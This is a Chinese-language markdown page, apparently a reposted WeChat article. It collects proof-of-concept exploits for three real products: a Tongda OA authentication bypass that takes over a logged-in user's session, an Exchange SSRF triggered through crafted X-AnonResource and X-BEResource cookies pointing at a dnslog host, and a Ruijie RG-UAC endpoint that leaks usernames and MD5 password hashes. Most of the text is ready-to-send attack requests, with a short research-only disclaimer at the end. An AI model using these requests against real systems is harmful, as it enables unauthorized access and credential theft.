Skip to content

Latest commit

 

History

History
166 lines (87 loc) · 6.29 KB

近期漏洞复现(含 POC).md

File metadata and controls

166 lines (87 loc) · 6.29 KB

本文由 简悦 SimpRead 转码, 原文地址 mp.weixin.qq.com

1

通达 OA 未授权访问

漏洞类型:

未授权访问

漏洞利用条件:

用户在线

漏洞详情

1、先访问

http://xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

如果出现空白页面, 则说明已经获得权限.

2、在访问 http://xxx.xxx.xxx/general/ , 成功进入系统

3、如果出现 RELOGIN, 则说明目前没有人在线, 需要等待有人登录的时候在尝试

漏洞 POC:

GET http://xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
GET http://xxx.xxx.xxx/general/

2

Exchange SSRF

漏洞类型:

SSRF

漏洞利用条件:

漏洞详情

1、寻找目标

2、在 cookie 中插入 dnslog payload

3、DNSLOG 刷新, 证明 SSRF 存在

漏洞 POC:

GET /owa/auth/x.js HTTP/1.1
Cookie:
X-AnonResource=true; X-AnonResource-Backend=woizqq.dnslog.cn/ecp/default.flt?~3; X-BEResource=woizqq.dnslog.cn/owa/auth/logon.aspx?~3;

3

锐捷 RG-UAC 信息泄漏

漏洞类型:

未授权访问, 敏感信息泄露

漏洞利用条件:

漏洞详情

1、直接访问锐捷 - UAC 的如下链接即可获得用户名和 MD5 加密密码

https://xxx.xxx.xxx/get_dkey.php

漏洞 POC:

GET https://xxx.xxx.xxx/get_dkey.php

END

注:此文章只用于漏洞研究,切勿用于违法用途。因滥用产生的一切后果与本公众号无关。

参考文章:

https://mp.weixin.qq.com/s/LJRI04VViL4hbt6dbmGHAw

https://paper.seebug.org/1492/

https://twitter.com/zhzyker/status/1368572200194740232/photo/1

https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065

扫码关注更多精彩